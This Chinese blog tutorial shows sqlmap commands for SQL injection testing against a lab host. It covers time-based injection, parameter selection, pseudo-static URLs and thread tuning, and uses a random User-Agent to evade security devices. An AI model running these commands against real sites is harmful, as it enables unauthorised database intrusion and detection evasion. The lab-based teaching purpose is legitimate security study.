SQLMAP工具之实战渗透技巧二

文中通过详细讲解SQLMAP工具,更加深入的掌握SQLMAP用法;文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

sqlmap实战渗透技巧二

时间注入参数

当我们在实战中通常会遇见网络问题或存在防护的情况,因为sqlmap默认的是所有模式的payload都会进行检测,所以需要有针对性的使用,来避免流量过大。
当SQL注入点 只允许时间注入,那么我们可以使用参数–technique:

sqlmap -u "http://192.168.1.6/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql --technique=T -v 3

在这里插入图片描述
同样可以使用多种检测方式,使用参数–technique=BUET
在图中我们可以看出使用时间注入会加入参数–time-sec(返回时间), 默认是5秒,我们可以设置这个参数的时间长短。

sqlmap -u "http://192.168.1.6/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql --technique=T -v 3 --flush-session --time-sec=8

在这里插入图片描述

修改请求头

在使用sqlmap测试时,在HTTP的User-Agent中会有关于sqlmap的一些信息,这样就会很容易被防护设备检测到,所以我们通常会使用随机的请求头参数–random-agent来进行检测,从而绕过部分安全设备检测:
我们可以使用-v 6来查看默认的请求头:
在这里插入图片描述
当我们使用–random-agent 来进行修改后,再来查看发现User-agent已被修改成浏览器正常的请求头:
在这里插入图片描述

sqlmap -u "http://192.168.1.6/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql --technique=T -v 3 --flush-session --random-agent

在这里插入图片描述

超时设置

在sqlmap中存在页面超时的时限,使用的参数是–timeout ,默认是30秒,当我们需要加强检测的效率,我们可以将这个时间缩短:

sqlmap -u "http://192.168.1.6/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql --technique=T -v 3 --flush-session --random-agent --timeout=10 

在这里插入图片描述
在sqlmap中,同样可以指定注入点的参数来进行检测,例如我们这里有name和submit这两个参数,我们就可以使用-p来指定参数:

sqlmap -u "http://192.168.1.6/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -p name

在这里插入图片描述
可以看出name这个值是存在注入的,而我们使用submit这个值是不存在的:
在这里插入图片描述

伪静态检测

当我们没有检测到存在注入的时候,sqlmap中则会在最后提示我们是否提升等级,或者使用随机的请求头、使用一些tamper脚本等等。
当我们检测的网站使用的是伪静态,我们可以使用 * 来进行检测:

sqlmap -u "http://192.168.1.6/06/vul/sqli/id/1*.html  

因为这种伪静态的是没有参数,sqlmap同样不会自行去将某一个路径作为值来检测,所以我们需要使用 * 来进行分割,像sqlmap说明次数作为一个值来进行检测是否存在注入。
在日常的检测中,有的时候我们需要提升sqlmap的检测效率,同样我们可以提升它的线程:

sqlmap -u "http://192.168.1.6/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql --batch --flush-session --threads=10

在这里插入图片描述
但这个线程最大是10,当我们使用大于10,则会报错提示:
在这里插入图片描述

线程设置

同样我们可以在sqlmap的配置文件中进行最大线程数的修改:

/usr/share/sqlmap/lib/core/settings.py  #这个路径下的配置文件来进行修改

在这里插入图片描述
修改保存后,我们就可以使用–threads=20,来进行检测:
但如果线程过高,在测试中可能会造成系统崩溃,所以尽可能的选择合适的线程来进行测试:
在这里插入图片描述

  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
### 回答1: 要下载SQLMap工具,可以通过以下步骤在CSDN(中国最大的技术社区)进行下载: 1. 首先,在浏览器中打开CSDN的网站(www.csdn.net)。 2. 在CSDN的主页上,找到网站的搜索栏。在搜索栏中输入“SQLMap工具下载”并点击搜索按钮。 3. 搜索结果页面会显示与SQLMap工具下载相关的文章、教程或资源。 4. 仔细查看搜索结果中的文章标题和描述,并寻找与SQLMap工具下载相关的资源。 5. 选择一个合适的文章或教程链接,点击进入详细页面。 6. 在详细页面中,会提供SQLMap工具下载的相关信息和链接。仔细阅读页面上的说明和指南,以确保你下载到合适版本的SQLMap工具。 7. 一般而言,你可以在页面上找到一个下载按钮或者链接。点击该按钮或链接即可开始下载SQLMap工具。 8. 下载完成后,使用一个合适的解压工具(如WinRAR或7-Zip)解压SQLMap工具的压缩包。 9. 解压后,你就可以开始使用SQLMap工具了。你可以根据自己的需要配置和使用该工具进行SQL注入漏洞的测试和防护。 需要注意的是,在下载任何工具或资源之前,应该确保以安全的方式进行。这包括确保源网站的可信度和文件的完整性,仔细查看任何可能的风险或警告,并根据自己的需求选择适合的版本和来源。 ### 回答2: sqlmap是一种强大的开源工具,用于检测和利用Web应用程序中的SQL注入漏洞。我们可以在CSDN上下载这个工具。 要下载sqlmap工具,我们可以按照以下步骤进行操作。 首先,我们打开浏览器,进入CSDN的官方网站(www.csdn.net)。 在CSDN的主页上,我们可以看到一个搜索栏。在搜索栏中,我们输入"sqlmap"并点击搜索按钮。 搜索结果页面会显示与"sqlmap"相关的内容。我们可以通过筛选器选择合适的结果。 在筛选器中,我们可以选择"工具"类别,以便快速找到sqlmap工具。 点击选择后,页面会刷新,显示与"sqlmap"相关的工具列表。 从列表中,我们可以找到可靠的、由CSDN认证的sqlmap工具。我们可以通过点击工具名称或下载按钮来进一步了解和下载工具。 在工具页面上,我们可以看到关于工具的详细信息,例如介绍、功能、使用方法等。 对于下载工具,我们可以点击页面上的下载按钮。网站可能会提示我们先登录或创建一个CSDN账号。 完成登录或账号创建后,我们可以再次点击下载按钮,此时页面会跳转到下载页面。 在下载页面上,我们可以选择适合我们操作系统的版本,并点击下载按钮。 下载过程可能需要一些时间,这取决于我们的网络状况和服务器响应速度。 下载完成后,我们可以在指定位置找到下载的sqlmap工具。此时,我们可以将它解压缩并执行相关操作。 总结来说,我们可以通过CSDN来下载sqlmap工具。只需要在CSDN网站上搜索sqlmap工具,找到可靠的下载源并进行下载,然后按照需要解压缩和使用它进行相关的SQL注入漏洞检测和利用工作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

全局变量Global

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值